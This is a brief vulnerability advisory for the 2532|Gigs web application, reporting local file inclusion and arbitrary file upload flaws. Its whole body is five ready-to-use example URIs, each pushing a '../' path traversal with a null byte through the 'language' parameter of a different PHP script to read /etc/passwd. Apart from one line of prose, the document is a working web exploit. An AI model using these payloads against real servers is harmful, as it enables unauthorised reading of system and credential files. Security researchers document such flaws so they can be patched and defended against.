2532designs 2532|Gigs Local File Include and Arbitrary File Upload Vulnerabilities

2532designs 2532|Gigs Local File Include and Arbitrary File Upload Vulnerabilities

An attacker can exploit these issues via a browser.

The following example URIs are available:

http://www.example.com/[path]/settings.php?language=../../../../../../../../../../etc/passwd%00
http://www.example.com/[path]/deleteuser.php?language=../../../../../../../../../../etc/passwd%00
http://www.example.com/[path]/mini_calendar?language=../../../../../../../../../../etc/passwd%00
http://www.example.com /[path]/manage_venues.php?language=../../../../../../../../../../etc/passwd%00
http://www.example.com/[path]/manage_gigs.php?language=../../../../../../../../../../etc/passwd%00